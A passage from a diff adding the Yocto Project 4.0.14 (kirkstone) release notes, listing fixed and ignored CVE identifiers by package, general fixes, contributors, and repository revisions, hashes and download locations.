:cve:`2019-9500`, :cve:`2019-9503`, :cve:`2019-9506`, :cve:`2019-9857`, :cve:`2020-0009`, :cve:`2020-0030`, :cve:`2020-0041`, :cve:`2020-0066`, :cve:`2020-0067`, :cve:`2020-0110`, :cve:`2020-0255`, :cve:`2020-0305`, :cve:`2020-0404`, :cve:`2020-0423`, :cve:`2020-0427`, :cve:`2020-0429`, :cve:`2020-0430`, :cve:`2020-0431`, :cve:`2020-0432`, :cve:`2020-0433`, :cve:`2020-0435`, :cve:`2020-0444`, :cve:`2020-0465`, :cve:`2020-0466`, :cve:`2020-0543`, :cve:`2020-10135`, :cve:`2020-10690`, :cve:`2020-10711`, :cve:`2020-10720`, :cve:`2020-10732`, :cve:`2020-10742`, :cve:`2020-10751`, :cve:`2020-10757`, :cve:`2020-10766`, :cve:`2020-10767`, :cve:`2020-10768`, :cve:`2020-10769`, :cve:`2020-10773`, :cve:`2020-10781`, :cve:`2020-10942`, :cve:`2020-11494`, :cve:`2020-11565`, :cve:`2020-11608`, :cve:`2020-11609`, :cve:`2020-11668`, :cve:`2020-11669`, :cve:`2020-11884`, :cve:`2020-12114`, :cve:`2020-12351`, :cve:`2020-12352`, :cve:`2020-12464`, :cve:`2020-12465`, :cve:`2020-12652`, 
:cve:`2020-12653`, :cve:`2020-12654`, :cve:`2020-12655`, :cve:`2020-12656`, :cve:`2020-12657`, :cve:`2020-12659`, :cve:`2020-12768`, :cve:`2020-12769`, :cve:`2020-12770`, :cve:`2020-12771`, :cve:`2020-12826`, :cve:`2020-12888`, :cve:`2020-12912`, :cve:`2020-13143`, :cve:`2020-13974`, :cve:`2020-14305`, :cve:`2020-14314`, :cve:`2020-14331`, :cve:`2020-14351`, :cve:`2020-14353`, :cve:`2020-14356`, :cve:`2020-14381`, :cve:`2020-14385`, :cve:`2020-14386`, :cve:`2020-14390`, :cve:`2020-14416`, :cve:`2020-15393`, :cve:`2020-15436`, :cve:`2020-15437`, :cve:`2020-15780`, :cve:`2020-15852`, :cve:`2020-16119`, :cve:`2020-16120`, :cve:`2020-16166`, :cve:`2020-1749`, :cve:`2020-24394`, :cve:`2020-24490`, :cve:`2020-24586`, :cve:`2020-24587`, :cve:`2020-24588`, :cve:`2020-25211`, :cve:`2020-25212`, :cve:`2020-25221`, :cve:`2020-25284`, :cve:`2020-25285`, :cve:`2020-25639`, :cve:`2020-25641`, :cve:`2020-25643`, :cve:`2020-25645`, :cve:`2020-25656`, :cve:`2020-25668`, :cve:`2020-25669`, :cve:`2020-25670`, :cve:`2020-25671`, :cve:`2020-25672`, :cve:`2020-25673`, :cve:`2020-25704`, :cve:`2020-25705`, :cve:`2020-26088`, :cve:`2020-26139`, :cve:`2020-26141`, :cve:`2020-26145`, :cve:`2020-26147`, :cve:`2020-26541`, :cve:`2020-26555`, :cve:`2020-26558`, :cve:`2020-27066`, :cve:`2020-27067`, :cve:`2020-27068`, :cve:`2020-27152`, :cve:`2020-27170`, :cve:`2020-27171`, :cve:`2020-27194`, :cve:`2020-2732`, :cve:`2020-27418`, :cve:`2020-27673`, :cve:`2020-27675`, :cve:`2020-27777`, :cve:`2020-27784`, :cve:`2020-27786`, :cve:`2020-27815`, :cve:`2020-27820`, :cve:`2020-27825`, :cve:`2020-27830`, :cve:`2020-27835`, :cve:`2020-28097`, :cve:`2020-28374`, :cve:`2020-28588`, :cve:`2020-28915`, :cve:`2020-28941`, :cve:`2020-28974`, :cve:`2020-29368`, :cve:`2020-29369`, :cve:`2020-29370`, :cve:`2020-29371`, :cve:`2020-29372`, :cve:`2020-29373`, :cve:`2020-29374`, :cve:`2020-29534`, :cve:`2020-29568`, :cve:`2020-29569`, :cve:`2020-29660`, :cve:`2020-29661`, :cve:`2020-35499`, :cve:`2020-35508`, 
:cve:`2020-35513`, :cve:`2020-35519`, :cve:`2020-36158`, :cve:`2020-36310`, :cve:`2020-36311`, :cve:`2020-36312`, :cve:`2020-36313`, :cve:`2020-36322`, :cve:`2020-36385`, :cve:`2020-36386`, :cve:`2020-36387`, :cve:`2020-36516`, :cve:`2020-36557`, :cve:`2020-36558`, :cve:`2020-36691`, :cve:`2020-36694`, :cve:`2020-36766`, :cve:`2020-3702`, :cve:`2020-4788`, :cve:`2020-7053`, :cve:`2020-8428`, :cve:`2020-8647`, :cve:`2020-8648`, :cve:`2020-8649`, :cve:`2020-8694`, :cve:`2020-8834`, :cve:`2020-8835`, :cve:`2020-8992`, :cve:`2020-9383`, :cve:`2020-9391`, :cve:`2021-0129`, :cve:`2021-0342`, :cve_mitre:`2021-0447`, :cve_mitre:`2021-0448`, :cve:`2021-0512`, :cve:`2021-0605`, :cve:`2021-0707`, :cve:`2021-0920`, :cve:`2021-0929`, :cve:`2021-0935`, :cve_mitre:`2021-0937`, :cve:`2021-0938`, :cve:`2021-0941`, :cve:`2021-1048`, :cve:`2021-20177`, :cve:`2021-20194`, :cve:`2021-20226`, :cve:`2021-20239`, :cve:`2021-20261`, :cve:`2021-20265`, :cve:`2021-20268`, :cve:`2021-20292`, :cve:`2021-20317`, :cve:`2021-20320`, :cve:`2021-20321`, :cve:`2021-20322`, :cve:`2021-21781`, :cve:`2021-22543`, :cve:`2021-22555`, :cve:`2021-22600`, :cve:`2021-23133`, :cve:`2021-23134`, :cve:`2021-26401`, :cve:`2021-26708`, :cve:`2021-26930`, :cve:`2021-26931`, :cve:`2021-26932`, :cve:`2021-27363`, :cve:`2021-27364`, :cve:`2021-27365`, :cve:`2021-28038`, :cve:`2021-28039`, :cve:`2021-28375`, :cve:`2021-28660`, :cve:`2021-28688`, :cve:`2021-28691`, :cve:`2021-28711`, :cve:`2021-28712`, :cve:`2021-28713`, :cve:`2021-28714`, :cve:`2021-28715`, :cve:`2021-28950`, :cve:`2021-28951`, :cve:`2021-28952`, :cve:`2021-28964`, :cve:`2021-28971`, :cve:`2021-28972`, :cve:`2021-29154`, :cve:`2021-29155`, :cve:`2021-29264`, :cve:`2021-29265`, :cve:`2021-29266`, :cve:`2021-29646`, :cve:`2021-29647`, :cve:`2021-29648`, :cve:`2021-29649`, :cve:`2021-29650`, :cve:`2021-29657`, :cve:`2021-30002`, :cve:`2021-30178`, :cve:`2021-31440`, :cve:`2021-3178`, :cve:`2021-31829`, :cve:`2021-31916`, :cve:`2021-32399`, 
:cve:`2021-32606`, :cve:`2021-33033`, :cve:`2021-33034`, :cve:`2021-33098`, :cve:`2021-33135`, :cve:`2021-33200`, :cve:`2021-3347`, :cve:`2021-3348`, :cve:`2021-33624`, :cve:`2021-33655`, :cve:`2021-33656`, :cve:`2021-33909`, :cve:`2021-3411`, :cve:`2021-3428`, :cve:`2021-3444`, :cve:`2021-34556`, :cve:`2021-34693`, :cve:`2021-3483`, :cve:`2021-34866`, :cve:`2021-3489`, :cve:`2021-3490`, :cve:`2021-3491`, :cve_mitre:`2021-34981`, :cve:`2021-3501`, :cve:`2021-35039`, :cve:`2021-3506`, :cve:`2021-3543`, :cve:`2021-35477`, :cve:`2021-3564`, :cve:`2021-3573`, :cve:`2021-3587`, :cve_mitre:`2021-3600`, :cve:`2021-3609`, :cve:`2021-3612`, :cve:`2021-3635`, :cve:`2021-3640`, :cve:`2021-3653`, :cve:`2021-3655`, :cve:`2021-3656`, :cve:`2021-3659`, :cve:`2021-3679`, :cve:`2021-3715`, :cve:`2021-37159`, :cve:`2021-3732`, :cve:`2021-3736`, :cve:`2021-3739`, :cve:`2021-3743`, :cve:`2021-3744`, :cve:`2021-3752`, :cve:`2021-3753`, :cve:`2021-37576`, :cve:`2021-3759`, :cve:`2021-3760`, :cve:`2021-3764`, :cve:`2021-3772`, :cve:`2021-38160`, :cve:`2021-38166`, :cve:`2021-38198`, :cve:`2021-38199`, :cve:`2021-38200`, :cve:`2021-38201`, :cve:`2021-38202`, :cve:`2021-38203`, :cve:`2021-38204`, :cve:`2021-38205`, :cve:`2021-38206`, :cve:`2021-38207`, :cve:`2021-38208`, :cve:`2021-38209`, :cve:`2021-38300`, :cve:`2021-3894`, :cve:`2021-3896`, :cve:`2021-3923`, :cve:`2021-39633`, :cve:`2021-39634`, :cve:`2021-39636`, :cve:`2021-39648`, :cve:`2021-39656`, :cve:`2021-39657`, :cve:`2021-39685`, :cve:`2021-39686`, :cve:`2021-39698`, :cve:`2021-39711`, :cve:`2021-39713`, :cve:`2021-39714`, :cve:`2021-4001`, :cve:`2021-4002`, :cve:`2021-4028`, :cve:`2021-4032`, :cve:`2021-4037`, :cve:`2021-40490`, :cve:`2021-4083`, :cve:`2021-4090`, :cve:`2021-4093`, :cve:`2021-4095`, :cve:`2021-41073`, :cve:`2021-4135`, :cve:`2021-4148`, :cve:`2021-4149`, :cve:`2021-4154`, :cve:`2021-4155`, :cve:`2021-4157`, :cve:`2021-4159`, :cve:`2021-41864`, :cve:`2021-4197`, :cve:`2021-42008`, :cve:`2021-4202`, 
:cve:`2021-4203`, :cve:`2021-4218`, :cve:`2021-42252`, :cve:`2021-42327`, :cve:`2021-42739`, :cve:`2021-43056`, :cve:`2021-43057`, :cve:`2021-43267`, :cve:`2021-43389`, :cve:`2021-43975`, :cve:`2021-43976`, :cve:`2021-44733`, :cve:`2021-45095`, :cve:`2021-45100`, :cve:`2021-45402`, :cve:`2021-45469`, :cve:`2021-45480`, :cve:`2021-45485`, :cve:`2021-45486`, :cve:`2021-45868`, :cve:`2021-46283`, :cve:`2022-0001`, :cve:`2022-0002`, :cve:`2022-0168`, :cve:`2022-0171`, :cve:`2022-0185`, :cve:`2022-0264`, :cve:`2022-0286`, :cve:`2022-0322`, :cve:`2022-0330`, :cve:`2022-0433`, :cve:`2022-0435`, :cve:`2022-0487`, :cve:`2022-0492`, :cve:`2022-0494`, :cve:`2022-0516`, :cve:`2022-0617`, :cve:`2022-0644`, :cve:`2022-0646`, :cve:`2022-0742`, :cve:`2022-0812`, :cve:`2022-0847`, :cve:`2022-0850`, :cve:`2022-0854`, :cve:`2022-0995`, :cve:`2022-1011`, :cve:`2022-1012`, :cve:`2022-1015`, :cve:`2022-1016`, :cve:`2022-1043`, :cve:`2022-1048`, :cve:`2022-1055`, :cve:`2022-1158`, :cve:`2022-1184`, :cve:`2022-1195`, :cve:`2022-1198`, :cve:`2022-1199`, :cve:`2022-1204`, :cve:`2022-1205`, :cve:`2022-1353`, :cve:`2022-1419`, :cve:`2022-1462`, :cve:`2022-1516`, :cve:`2022-1651`, :cve:`2022-1652`, :cve:`2022-1671`, :cve:`2022-1678`, :cve:`2022-1679`, :cve:`2022-1729`, :cve:`2022-1734`, :cve:`2022-1786`, :cve:`2022-1789`, :cve:`2022-1836`, :cve:`2022-1852`, :cve:`2022-1882`, :cve:`2022-1943`, :cve:`2022-1966`, :cve:`2022-1972`, :cve:`2022-1973`, :cve:`2022-1974`, :cve:`2022-1975`, :cve:`2022-1976`, :cve:`2022-1998`, :cve:`2022-20008`, :cve:`2022-20132`, :cve:`2022-20141`, :cve:`2022-20153`, :cve:`2022-20154`, :cve:`2022-20158`, :cve:`2022-20166`, :cve:`2022-20368`, :cve:`2022-20369`, :cve:`2022-20421`, :cve:`2022-20422`, :cve:`2022-20423`, :cve_mitre:`2022-20565`, :cve:`2022-20566`, :cve:`2022-20567`, :cve:`2022-20572`, :cve:`2022-2078`, :cve:`2022-21123`, :cve:`2022-21125`, :cve:`2022-21166`, :cve:`2022-21385`, :cve:`2022-21499`, :cve_mitre:`2022-21505`, :cve:`2022-2153`, :cve:`2022-2196`, 
:cve_mitre:`2022-22942`, :cve:`2022-23036`, :cve:`2022-23037`, :cve:`2022-23038`, :cve:`2022-23039`, :cve:`2022-23040`, :cve:`2022-23041`, :cve:`2022-23042`, :cve:`2022-2308`, :cve:`2022-2318`, :cve:`2022-2380`, :cve:`2022-23816`, :cve:`2022-23960`, :cve:`2022-24122`, :cve:`2022-24448`, :cve:`2022-24958`, :cve:`2022-24959`, :cve:`2022-2503`, :cve:`2022-25258`, :cve:`2022-25375`, :cve:`2022-25636`, :cve_mitre:`2022-2585`, :cve_mitre:`2022-2586`, :cve_mitre:`2022-2588`, :cve:`2022-2590`, :cve_mitre:`2022-2602`, :cve:`2022-26365`, :cve:`2022-26373`, :cve:`2022-2639`, :cve:`2022-26490`, :cve:`2022-2663`, :cve:`2022-26966`, :cve:`2022-27223`, :cve:`2022-27666`, :cve:`2022-2785`, :cve:`2022-27950`, :cve:`2022-28356`, :cve:`2022-28388`, :cve:`2022-28389`, :cve:`2022-28390`, :cve:`2022-2873`, :cve:`2022-28796`, :cve:`2022-28893`, :cve:`2022-2905`, :cve:`2022-29156`, :cve:`2022-2938`, :cve:`2022-29581`, :cve:`2022-29582`, :cve:`2022-2959`, :cve:`2022-2964`, :cve:`2022-2977`, :cve:`2022-2978`, :cve:`2022-29900`, :cve:`2022-29901`, :cve:`2022-29968`, :cve:`2022-3028`, :cve:`2022-30594`, :cve:`2022-3061`, :cve:`2022-3077`, :cve:`2022-3078`, :cve:`2022-3103`, :cve:`2022-3104`, :cve:`2022-3105`, :cve:`2022-3106`, :cve:`2022-3107`, :cve:`2022-3110`, :cve:`2022-3111`, :cve:`2022-3112`, :cve:`2022-3113`, :cve:`2022-3114`, :cve:`2022-3115`, :cve:`2022-3169`, :cve:`2022-3170`, :cve:`2022-3202`, :cve:`2022-32250`, :cve:`2022-32296`, :cve:`2022-3239`, :cve:`2022-32981`, :cve:`2022-3303`, :cve:`2022-33740`, :cve:`2022-33741`, :cve:`2022-33742`, :cve:`2022-33743`, :cve:`2022-33744`, :cve:`2022-33981`, :cve:`2022-3424`, :cve:`2022-3435`, :cve:`2022-34494`, :cve:`2022-34495`, :cve:`2022-34918`, :cve:`2022-3521`, :cve:`2022-3524`, :cve:`2022-3526`, :cve:`2022-3531`, :cve:`2022-3532`, :cve:`2022-3534`, :cve:`2022-3535`, :cve:`2022-3541`, :cve:`2022-3542`, :cve:`2022-3543`, :cve:`2022-3545`, :cve:`2022-3564`, :cve:`2022-3565`, :cve:`2022-3577`, :cve:`2022-3586`, :cve:`2022-3594`, 
:cve:`2022-36123`, :cve:`2022-3619`, :cve:`2022-3621`, :cve:`2022-3623`, :cve:`2022-3625`, :cve:`2022-3628`, :cve:`2022-36280`, :cve:`2022-3629`, :cve:`2022-3630`, :cve:`2022-3633`, :cve:`2022-3635`, :cve:`2022-3640`, :cve:`2022-3643`, :cve:`2022-3646`, :cve:`2022-3649`, :cve:`2022-36879`, :cve:`2022-36946`, :cve:`2022-3707`, :cve:`2022-3910`, :cve:`2022-39189`, :cve:`2022-39190`, :cve:`2022-3977`, :cve:`2022-39842`, :cve:`2022-40307`, :cve:`2022-40476`, :cve:`2022-40768`, :cve:`2022-4095`, :cve:`2022-40982`, :cve:`2022-41218`, :cve:`2022-41222`, :cve:`2022-4127`, :cve:`2022-4128`, :cve:`2022-4129`, :cve:`2022-4139`, :cve:`2022-41674`, :cve:`2022-41849`, :cve:`2022-41850`, :cve:`2022-41858`, :cve:`2022-42328`, :cve:`2022-42329`, :cve:`2022-42432`, :cve:`2022-4269`, :cve:`2022-42703`, :cve:`2022-42719`, :cve:`2022-42720`, :cve:`2022-42721`, :cve:`2022-42722`, :cve:`2022-42895`, :cve:`2022-42896`, :cve:`2022-43750`, :cve:`2022-4378`, :cve:`2022-4379`, :cve:`2022-4382`, :cve:`2022-43945`, :cve:`2022-45869`, :cve:`2022-45886`, :cve:`2022-45887`, :cve:`2022-45888`, :cve:`2022-45919`, :cve:`2022-45934`, :cve:`2022-4662`, :cve:`2022-4744`, :cve:`2022-47518`, :cve:`2022-47519`, :cve:`2022-47520`, :cve:`2022-47521`, :cve:`2022-47929`, :cve:`2022-47938`, :cve:`2022-47939`, :cve:`2022-47940`, :cve:`2022-47941`, :cve:`2022-47942`, :cve:`2022-47943`, :cve:`2022-4842`, :cve:`2022-48423`, :cve:`2022-48424`, :cve:`2022-48425`, :cve:`2022-48502`, :cve:`2023-0030`, :cve:`2023-0045`, :cve:`2023-0047`, :cve:`2023-0122`, :cve:`2023-0160`, :cve:`2023-0179`, :cve:`2023-0210`, :cve:`2023-0240`, :cve:`2023-0266`, :cve:`2023-0394`, :cve:`2023-0458`, :cve:`2023-0459`, :cve:`2023-0461`, :cve:`2023-0468`, :cve:`2023-0469`, :cve:`2023-0590`, :cve:`2023-0615`, :cve_mitre:`2023-1032`, :cve:`2023-1073`, :cve:`2023-1074`, :cve:`2023-1076`, :cve:`2023-1077`, :cve:`2023-1078`, :cve:`2023-1079`, :cve:`2023-1095`, :cve:`2023-1118`, :cve:`2023-1192`, :cve:`2023-1194`, :cve:`2023-1195`, :cve:`2023-1206`, 
:cve:`2023-1249`, :cve:`2023-1252`, :cve:`2023-1281`, :cve:`2023-1380`, :cve:`2023-1382`, :cve:`2023-1390`, :cve:`2023-1513`, :cve:`2023-1582`, :cve:`2023-1583`, :cve:`2023-1611`, :cve:`2023-1637`, :cve:`2023-1652`, :cve:`2023-1670`, :cve:`2023-1829`, :cve:`2023-1838`, :cve:`2023-1855`, :cve:`2023-1859`, :cve:`2023-1989`, :cve:`2023-1990`, :cve:`2023-1998`, :cve:`2023-2002`, :cve:`2023-2006`, :cve:`2023-2008`, :cve:`2023-2019`, :cve:`2023-20569`, :cve:`2023-20588`, :cve:`2023-20593`, :cve:`2023-20938`, :cve:`2023-21102`, :cve:`2023-21106`, :cve:`2023-2124`, :cve:`2023-21255`, :cve:`2023-21264`, :cve:`2023-2156`, :cve:`2023-2162`, :cve:`2023-2163`, :cve:`2023-2166`, :cve:`2023-2177`, :cve:`2023-2194`, :cve:`2023-2235`, :cve:`2023-2236`, :cve:`2023-2248`, :cve:`2023-2269`, :cve:`2023-22996`, :cve:`2023-22997`, :cve:`2023-22998`, :cve:`2023-22999`, :cve:`2023-23001`, :cve:`2023-23002`, :cve:`2023-23003`, :cve:`2023-23004`, :cve:`2023-23005`, :cve:`2023-23006`, :cve:`2023-23454`, :cve:`2023-23455`, :cve:`2023-23559`, :cve:`2023-2483`, :cve:`2023-25012`, :cve:`2023-2513`, :cve:`2023-25775`, :cve:`2023-2598`, :cve:`2023-26544`, :cve:`2023-26545`, :cve:`2023-26605`, :cve:`2023-26606`, :cve:`2023-26607`, :cve:`2023-28327`, :cve:`2023-28328`, :cve:`2023-28410`, :cve:`2023-28464`, :cve:`2023-28466`, :cve:`2023-2860`, :cve:`2023-28772`, :cve:`2023-28866`, :cve:`2023-2898`, :cve:`2023-2985`, :cve:`2023-3006`, :cve:`2023-30456`, :cve:`2023-30772`, :cve:`2023-3090`, :cve:`2023-3106`, :cve:`2023-3111`, :cve:`2023-3117`, :cve:`2023-31248`, :cve:`2023-3141`, :cve:`2023-31436`, :cve:`2023-3159`, :cve:`2023-3161`, :cve:`2023-3212`, :cve:`2023-3220`, :cve:`2023-32233`, :cve:`2023-32247`, :cve:`2023-32248`, :cve:`2023-32250`, :cve:`2023-32252`, :cve:`2023-32254`, :cve:`2023-32257`, :cve:`2023-32258`, :cve:`2023-32269`, :cve:`2023-3268`, :cve:`2023-3269`, :cve:`2023-3312`, :cve:`2023-3317`, :cve:`2023-33203`, :cve:`2023-33250`, :cve:`2023-33288`, :cve:`2023-3338`, :cve:`2023-3355`, 
:cve:`2023-3357`, :cve:`2023-3358`, :cve:`2023-3359`, :cve:`2023-3390`, :cve:`2023-33951`, :cve:`2023-33952`, :cve:`2023-34255`, :cve:`2023-34256`, :cve:`2023-34319`, :cve:`2023-3439`, :cve:`2023-35001`, :cve:`2023-3567`, :cve:`2023-35788`, :cve:`2023-35823`, :cve:`2023-35824`, :cve:`2023-35826`, :cve:`2023-35828`, :cve:`2023-35829`, :cve:`2023-3609`, :cve:`2023-3610`, :cve:`2023-3611`, :cve:`2023-37453`, :cve:`2023-3772`, :cve:`2023-3773`, :cve:`2023-3776`, :cve:`2023-3777`, :cve:`2023-3812`, :cve:`2023-38409`, :cve:`2023-38426`, :cve:`2023-38427`, :cve:`2023-38428`, :cve:`2023-38429`, :cve:`2023-38430`, :cve:`2023-38431`, :cve:`2023-38432`, :cve:`2023-3863`, :cve_mitre:`2023-3865`, :cve_mitre:`2023-3866`, :cve_mitre:`2023-3867`, :cve:`2023-39189`, :cve:`2023-39192`, :cve:`2023-39193`, :cve:`2023-39194`, :cve:`2023-4004`, :cve:`2023-4015`, :cve:`2023-40283`, :cve:`2023-4128`, :cve:`2023-4132`, :cve:`2023-4147`, :cve:`2023-4155`, :cve:`2023-4194`, :cve:`2023-4206`, :cve:`2023-4207`, :cve:`2023-4208`, :cve:`2023-4273`, :cve:`2023-42752`, :cve:`2023-42753`, :cve:`2023-42755`, :cve:`2023-42756`, :cve:`2023-4385`, :cve:`2023-4387`, :cve:`2023-4389`, :cve:`2023-4394`, :cve:`2023-44466`, :cve:`2023-4459`, :cve:`2023-4569`, :cve:`2023-45862`, :cve:`2023-45871`, :cve:`2023-4611`, :cve:`2023-4623`, :cve:`2023-4732`, :cve:`2023-4921` and :cve:`2023-5345`
+- linux-yocto/5.15: Ignore :cve:`2022-45886`, :cve:`2022-45887`, :cve:`2022-45919`, :cve:`2022-48502`, :cve:`2023-0160`, :cve:`2023-1206`, :cve:`2023-20593`, :cve:`2023-21264`, :cve:`2023-2898`, :cve:`2023-31248`, :cve:`2023-33250`, :cve:`2023-34319`, :cve:`2023-35001`, :cve:`2023-3611`, :cve:`2023-37453`, :cve:`2023-3773`, :cve:`2023-3776`, :cve:`2023-3777`, :cve:`2023-38432`, :cve:`2023-3863`, :cve_mitre:`2023-3865`, :cve_mitre:`2023-3866`, :cve:`2023-4004`, :cve:`2023-4015`, :cve:`2023-4132`, :cve:`2023-4147`, :cve:`2023-4194`, :cve:`2023-4385`, :cve:`2023-4387`, :cve:`2023-4389`, :cve:`2023-4394`, :cve:`2023-4459` and :cve:`2023-4611`
+- openssl: Fix :cve:`2023-4807` and :cve:`2023-5363`
+- python3-git: Fix :cve:`2023-40590` and :cve:`2023-41040`
+- python3-urllib3: Fix :cve:`2023-43804`
+- qemu: Ignore :cve:`2023-2680`
+- ruby: Fix :cve:`2023-36617`
+- shadow: Fix :cve_mitre:`2023-4641`
+- tiff: Fix :cve:`2023-3576` and :cve:`2023-40745`
+- vim: Fix :cve:`2023-5441` and :cve:`2023-5535`
+- webkitgtk: Fix :cve:`2023-32439`
+- xdg-utils: Fix :cve:`2022-4055`
+- xserver-xorg: ignore :cve:`2022-3553` (XQuartz-specific)
+- zlib: Fix :cve:`2023-45853`
+
+
+
+Fixes in Yocto-4.0.14
+~~~~~~~~~~~~~~~~~~~~~
+
+- SECURITY.md: Add file
+- apt: add missing <cstdint> for uint16_t
+- bind: update to 9.18.19
+- bitbake: SECURITY.md: add file
+- bitbake: bitbake-getvar: Add a quiet command line argument
+- bitbake: bitbake-worker/runqueue: Avoid unnecessary bytes object copies
+- brief-yoctoprojectqs: use new CDN mirror for sstate
+- bsp-guide: bsp.rst: replace reference to wiki
+- bsp-guide: bsp: skip Intel machines no longer supported in Poky
+- build-appliance-image: Update to kirkstone head revision
+- ccache: fix build with gcc-13
+- cml1: Fix KCONFIG_CONFIG_COMMAND not conveyed fully in do_menuconfig
+- contributor-guide/style-guide: Add a note about task idempotence
+- contributor-guide/style-guide: Refer to recipes, not packages
+- contributor-guide: deprecate "Accepted" patch status
+- contributor-guide: discourage marking patches as Inappropriate
+- contributor-guide: recipe-style-guide: add more patch tagging examples
+- contributor-guide: recipe-style-guide: add section about CVE patches
+- contributor-guide: style-guide: discourage using Pending patch status
+- dev-manual: add security team processes
+- dev-manual: fix testimage usage instructions
+- dev-manual: layers: Add notes about layer.conf
+- dev-manual: new-recipe.rst: add missing parenthesis to "Patching Code" section
+- dev-manual: new-recipe.rst: replace reference to wiki
+- dev-manual: start.rst: remove obsolete reference
+- dev-manual: wic: update "wic list images" output
+- dev/ref-manual: Document :term:`INIT_MANAGER`
+- fontcache.bbclass: avoid native recipes depending on target fontconfig
+- glibc: Update to latest on stable 2.35 branch (c84018a05aec..)
+- json-c: define :term:`CVE_VERSION`
+- kernel.bbclass: Add force flag to rm calls
+- libxpm: upgrade to 3.5.17
+- linux-firmware: create separate packages
+- linux-firmware: upgrade to 20230804
+- linux-yocto/5.10: update to v5.10.197
+- linux-yocto: update CVE exclusions
+- manuals: correct "yocto-linux" by "linux-yocto"
+- manuals: update linux-yocto append examples
+- migration-guides: add release notes for 4.0.13
+- openssl: Upgrade to 3.0.12
+- overview: Add note about non-reproducibility side effects
+- package_rpm: Allow compression mode override
+- poky.conf: bump version for 4.0.14
+- profile-manual: aesthetic cleanups
+- python3-git: upgrade to 3.1.37
+- python3-jinja2: fix for the ptest result format
+- python3-urllib3: upgrade to 1.26.17
+- ref-manual: Fix :term:`PACKAGECONFIG` term and add an example
+- ref-manual: Warn about :term:`COMPATIBLE_MACHINE` skipping native recipes
+- ref-manual: releases.svg: Scarthgap is now version 5.0
+- ref-manual: variables: add :term:`RECIPE_SYSROOT` and :term:`RECIPE_SYSROOT_NATIVE`
+- ref-manual: variables: add :term:`TOOLCHAIN_OPTIONS` variable
+- ref-manual: variables: add example for :term:`SYSROOT_DIRS` variable
+- ref-manual: variables: provide no-match example for :term:`COMPATIBLE_MACHINE`
+- sdk-manual: appendix-obtain: improve and update descriptions
+- test-manual: reproducible-builds: stop mentioning LTO bug
+- uboot-extlinux-config.bbclass: fix missed override syntax migration
+- vim: Upgrade to 9.0.2048
+
+
+Known Issues in Yocto-4.0.14
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+- N/A
+
+
+Contributors to Yocto-4.0.14
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+- Alexander Kanavin
+- Archana Polampalli
+- Armin Kuster
+- Arne Schwerdt
+- BELHADJ SALEM Talel
+- Bruce Ashfield
+- Chaitanya Vadrevu
+- Colin McAllister
+- Deepthi Hemraj
+- Etienne Cordonnier
+- Fahad Arslan
+- Hitendra Prajapati
+- Jaeyoon Jung
+- Joshua Watt
+- Khem Raj
+- Lee Chee Yang
+- Marta Rybczynska
+- Martin Jansa
+- Meenali Gupta
+- Michael Opdenacker
+- Narpat Mali
+- Niko Mauno
+- Paul Eggleton
+- Paulo Neves
+- Peter Marko
+- Quentin Schulz
+- Richard Purdie
+- Robert P. J. Day
+- Roland Hieber
+- Ross Burton
+- Ryan Eatmon
+- Shubham Kulkarni
+- Siddharth Doshi
+- Soumya Sambu
+- Steve Sakoman
+- Tim Orling
+- Trevor Gamblin
+- Vijay Anusuri
+- Wang Mingyu
+- Yash Shinde
+- Yogita Urade
+
+
+Repositories / Downloads for Yocto-4.0.14
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+poky
+
+- Repository Location: :yocto_git:`/poky`
+- Branch: :yocto_git:`kirkstone </poky/log/?h=kirkstone>`
+- Tag: :yocto_git:`yocto-4.0.14 </poky/log/?h=yocto-4.0.14>`
+- Git Revision: :yocto_git:`d8d6d921fad14b82167d9f031d4fca06b5e01883 </poky/commit/?id=d8d6d921fad14b82167d9f031d4fca06b5e01883>`
+- Release Artefact: poky-d8d6d921fad14b82167d9f031d4fca06b5e01883
+- sha: 46a6301e3921ee67cfe6be7ea544d6257f0c0f02ef15c5091287e024ff02d5f5
+- Download Locations:
+ http://downloads.yoctoproject.org/releases/yocto/yocto-4.0.14/poky-d8d6d921fad14b82167d9f031d4fca06b5e01883.tar.bz2
+ http://mirrors.kernel.org/yocto/yocto/yocto-4.0.14/poky-d8d6d921fad14b82167d9f031d4fca06b5e01883.tar.bz2
+
+openembedded-core
+
+- Repository Location: :oe_git:`/openembedded-core`
+- Branch: :oe_git:`kirkstone </openembedded-core/log/?h=kirkstone>`
+- Tag: :oe_git:`yocto-4.0.14 </openembedded-core/log/?h=yocto-4.0.14>`
+- Git Revision: :oe_git:`0eb8e67aa6833df0cde29833568a70e65c21d7e5 </openembedded-core/commit/?id=0eb8e67aa6833df0cde29833568a70e65c21d7e5>`
+- Release Artefact: oecore-0eb8e67aa6833df0cde29833568a70e65c21d7e5
+- sha: d510a7067b87ba935b8a7c9f9608d0e06b057009ea753ed190ddfacc7195ecc5
+- Download Locations:
+ http://downloads.yoctoproject.org/releases/yocto/yocto-4.0.14/oecore-0eb8e67aa6833df0cde29833568a70e65c21d7e5.tar.bz2
+ http://mirrors.kernel.org/yocto/yocto/yocto-4.0.14/oecore-0eb8e67aa6833df0cde29833568a70e65c21d7e5.tar.bz2
+
+meta-mingw
+
+- Repository Location: :yocto_git:`/meta-mingw`
+- Branch: :yocto_git:`kirkstone </meta-mingw/log/?h=kirkstone>`
+- Tag: :yocto_git:`yocto-4.0.14 </meta-mingw/log/?h=yocto-4.0.14>`
+- Git Revision: :yocto_git:`f6b38ce3c90e1600d41c2ebb41e152936a0357d7 </meta-mingw/commit/?id=f6b38ce3c90e1600d41c2ebb41e152936a0357d7>`
+- Release Artefact: meta-mingw-f6b38ce3c90e1600d41c2ebb41e152936a0357d7
+- sha: 7d57167c19077f4ab95623d55a24c2267a3a3fb5ed83688659b4c03586373b25
+- Download Locations:
+ http://downloads.yoctoproject.org/releases/yocto/yocto-4.0.14/meta-mingw-f6b38ce3c90e1600d41c2ebb41e152936a0357d7.tar.bz2
+ http://mirrors.kernel.org/yocto/yocto/yocto-4.0.14/meta-mingw-f6b38ce3c90e1600d41c2ebb41e152936a0357d7.tar.bz2
+
+meta-gplv2
+
+- Repository Location: :yocto_git:`/meta-gplv2`
+- Branch: :yocto_git:`kirkstone </meta-gplv2/log/?h=kirkstone>`
+- Tag: :yocto_git:`yocto-4.0.14 </meta-gplv2/log/?h=yocto-4.0.14>`
